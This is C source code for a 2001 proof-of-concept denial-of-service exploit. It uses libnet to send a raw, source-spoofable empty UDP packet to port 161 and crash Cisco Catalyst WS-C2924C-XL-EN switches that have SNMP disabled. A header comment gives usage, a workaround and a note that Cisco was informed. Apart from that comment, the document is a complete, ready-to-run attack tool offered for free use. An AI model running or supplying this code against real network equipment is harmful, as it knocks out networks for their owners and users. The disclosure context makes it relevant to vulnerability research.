/*
 * Crashing Catalyst WS-C2924C-XL-EN with NULL packet when SNMP is disabled.
 * Written 2001 by bashis [EFnet/IRCnet/bash@wcd.se], U may use it freely.
 *
 * Its possible to crash Cisco Catalyst WS-C2924C-XL-EN with a empty
 * UDP packet to port 161 when SNMP is disabled. (Other switches also?)
 *
 * Workaround: Enable SNMP, or enable SNMP and then disable SNMP.
 *
 * Seems that SNMP is listening, even if SNMP is disabled, why?
 *
 * Usage:
 * ./c2900xl-crash <any src ip> <dst ip>
 *
 *       <any src ip>: Any source IP will be accepted.
 *       <dst ip>: Catalyst to crash.
 *
 * This code requires libnet.
 * http://www.packetfactory.net/Projects/Libnet/dist/libnet.tar.gz
 *
 * 2001-04-19: Informed Cisco about this.
 *
 */

#include <stdio.h>
#include <string.h>
#include <libnet.h>


int main(int argc, char **argv)
{
	u_long src_ip, dst_ip;
	u_char *packet;
	int network, packet_size,c;

	printf("Crashing Catalyst WS-C2924C-XL-EN with NULL packet when SNMP is disabled.\nWritten 2001 by bashis @ [EFnet/IRCnet | bash@wcd.se]\n\n");

	if(getuid() && geteuid()) {
		printf("Well, root.. you know him?\n");
		exit(1);
 	}

	if(argc != 3) {
		printf("Usage: %s <any src ip> <dst ip>\n", argv[0]);
		exit(1);
	}

	if (!(src_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE)))
		libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n", argv[1]);

	if (!(dst_ip = libnet_name_resolve(argv[2], LIBNET_RESOLVE)))
		libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", argv[2]);

	printf("Sending NULL UDP packet to port 161 at %s..\n",argv[2]);

	packet_size = LIBNET_IP_H + LIBNET_UDP_H;

	if (!(libnet_init_packet(packet_size, &packet)))
 		libnet_error(LIBNET_ERR_FATAL, "Init of packet failed\n");

	if (!(network = libnet_open_raw_sock(IPPROTO_RAW)))
		libnet_error(LIBNET_ERR_FATAL, "Can't open network.\n");

	if (libnet_build_ip(LIBNET_UDP_H,0,242,0,64,IPPROTO_UDP,
	src_ip,dst_ip,NULL,0,packet) == -1)
		libnet_error(LIBNET_ERR_FATAL, "Can't create IP packet\n");

	if (libnet_build_udp(53199,161,NULL,NULL,packet + LIBNET_IP_H) == -1)
		libnet_error(LIBNET_ERR_FATAL, "Can't create UDP packet\n");
	
	if (libnet_do_checksum(packet, IPPROTO_UDP, LIBNET_UDP_H) == -1)
		libnet_error(LIBNET_ERR_FATAL, "UDP checksum failed\n");

	if (libnet_do_checksum(packet, IPPROTO_IP, LIBNET_IP_H) == -1)
		libnet_error(LIBNET_ERR_FATAL, "IP checksum failed\n");

	if((c=libnet_write_ip(network, packet, packet_size)) < packet_size)
		libnet_error(LN_ERR_WARNING, "Wrote only %d bytes, should written %d bytes\n",c,packet_size);

	if (libnet_close_raw_sock(network) == -1)
		libnet_error(LN_ERR_WARNING, "Couldn't close the interface\n");

	libnet_destroy_packet(&packet);

	exit(0);

} /* end main */
